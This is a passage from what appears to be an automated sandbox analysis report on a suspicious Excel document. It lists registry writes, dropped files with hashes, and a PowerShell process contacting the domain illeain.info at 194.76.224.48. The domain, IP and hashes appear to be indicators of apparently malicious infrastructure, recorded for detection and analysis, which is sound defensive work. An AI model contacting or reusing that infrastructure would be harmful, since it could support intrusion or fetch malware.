00000000000000000000000000000000000000000000000000000000000000000000
3244
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13C131
3244
EXCEL.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\13C2F6
13C2F6
04000000AC0C00005200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C00640065006C002000320033005F00300034005F003200300031003900200064006F0063002E0020004E00320030003200300033002E0078006C007300000000003400000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00520061007200240044004900620032003900310032002E00320037003300390037005C0001000000010000007DF861B4E0F9D401F6C21300F6C2130000000000AC0200006E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
3244
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
25933830
3688
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3688
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
0
Suspicious files
3
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3688
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13c576.TMP
binary
MD5: 5f9a7bf5388376d94c2edca422810bec
SHA256: 8b2183f4f2f735c231b1f81d46cb86cb1fb51168824de82f3a9ea79c12caf82c
3688
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 5f9a7bf5388376d94c2edca422810bec
SHA256: 8b2183f4f2f735c231b1f81d46cb86cb1fb51168824de82f3a9ea79c12caf82c
3688
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1BMO8IHV134UXJ13GYUE.temp
––
MD5:  ––
SHA256:  ––
3244
EXCEL.EXE
C:\Users\admin\AppData\Local\Temp\CVRBBF0.tmp.cvr
––
MD5:  ––
SHA256:  ––
2912
WinRAR.exe
C:\Users\admin\AppData\Local\Temp\Rar$DIb2912.27397\del 23_04_2019 doc. N20203.xls
document
MD5: 5cdcda8fec2e26e19f894d39adeff907
SHA256: 814417e0c6560c11bd8853ab2ba80e9ec2a0d68e112ddfd234175543eaa2fb0a

Find more information of the staic content and download it at the full report

Network activity

HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests.

Connections

PID Process IP ASN CN Reputation
3688 powershell.exe 194.76.224.48:443 –– unknown

DNS requests

Domain IP Reputation
illeain.info 194.76.224.48
unknown

Threats

No threats detected.

Debug output strings

No debug info.